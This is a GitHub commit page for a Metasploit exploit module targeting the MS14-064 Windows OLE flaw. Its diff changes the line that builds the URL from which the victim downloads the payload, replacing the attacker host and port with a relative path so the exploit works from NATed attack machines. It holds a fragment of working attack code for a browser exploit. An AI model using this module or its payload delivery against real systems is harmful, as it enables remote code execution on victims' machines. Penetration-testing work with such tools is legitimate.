Skip to content

Commit 89e27d9

Browse files
author
andygoblins
committed
Use relative URL to GET payload for WinXP
Relative URLs are simpler, and allow the exploit to work on attack machines in NAT environments. Example: attack machine is NATed and does not have a DNS hostname. SRVHOST must be 0.0.0.0 but the victim cannot access the attacker from Rex::Socket.source_address
1 parent fe3f9c7 commit 89e27d9

File tree

1 file changed

+1
-4
lines changed

1 file changed

+1
-4
lines changed

modules/exploits/windows/browser/ms14_064_ole_code_execution.rb

Lines changed: 1 addition & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -277,10 +277,7 @@ def vbs_vector(prep)
277277
vbs_name = "#{Rex::Text.rand_text_alpha(rand(16)+4)}.vbs"
278278
gif_name = "#{Rex::Text.rand_text_alpha(rand(5)+3)}.gif"
279279

280-
payload_src = (datastore['SSL'] ? 'https' : 'http')
281-
payload_src << '://'
282-
payload_src << (datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'])
283-
payload_src << ":#{datastore['SRVPORT']}#{get_module_resource}/#{gif_name}"
280+
payload_src = "#{gif_name}"
284281

285282
# I tried to use ADODB.Stream to save my downloaded executable, but I was hitting an issue
286283
# with it, so I ended up with Scripting.FileSystemObject. Not so bad I guess.

0 commit comments

Comments
 (0)